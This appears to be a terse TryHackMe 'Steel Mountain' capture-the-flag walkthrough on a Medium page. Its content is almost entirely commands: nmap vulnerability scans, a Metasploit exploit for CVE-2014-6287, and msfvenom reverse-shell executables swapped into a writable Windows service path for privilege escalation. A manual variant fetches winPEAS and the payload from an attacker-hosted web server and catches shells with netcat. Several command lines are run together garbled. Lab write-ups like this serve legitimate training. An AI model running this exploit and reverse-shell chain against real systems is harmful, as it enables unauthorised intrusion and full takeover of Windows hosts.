TryHackMe: Steel Mountain

  1. Deploy the machine.Who is the employee of the month?
nmap -Pn <ip>
nmap -sV -O <ip>
nmap --script vuln <ip>
port 80 -> http-vuln-cve2015–1635
port 8080 —> http-vuln-cve2011–3192
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
msfconsolesearch 2014-6287
use 0show options
set RHOSTS <target ip>set RPORT 8080run
cd /Usersls
cd billls
cd Desktopls
cat user.txt
  1. Upload Script
upload <path>
load powershellpowershell_shell
. .\Powerup.ps1Invoke-Allchecks
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
use multi/handlerset LHOST <attacker ip>set LPORT <attacker port>
sessions 3
upload /root/Desktop/ASCService.exe
shellsc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
migrate 648getsystem
cd /Users/Administrator/Desktoplscat root.txt
  1. Save script from
python -m SimpleHTTPServer 80
nc -lvp 4444
python <ip> 8080
mv ncat.exe nc.exe
python <ip> 8080
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
AdvancedSystemCareService9C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
powershell -c "Get-Service"
cd \Program Files (x86)\IObit\Advanced SystemCare
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
nc -lvp 1234
sc stop AdvancedSystemCareService9
rename ASCService.exe ASCService_bak.exe
powershell -c "Invoke-WebRequest -OutFile ASCService.exe"
sc start AdvancedSystemCareService9

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Understanding Dependency Injection by example with the Symfony DI component (part 1/2)

AWS Load Balancer

Software project management tools: Issue boards

CMU Bomb Lab with Radare2 — Phase 5

Moving Data to the Cloud: 5 Strong Questions You Need to Ask Before Making a Decision

My first project on the HTML/CSS Pirple course.

How to compile SASS into CSS and watch for changes?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store



More from Medium

Limit User’s Access [ Linux Syst

Grafana: Features

Knoxville’s Best: Bar Edition

Time to Create a BSC Token: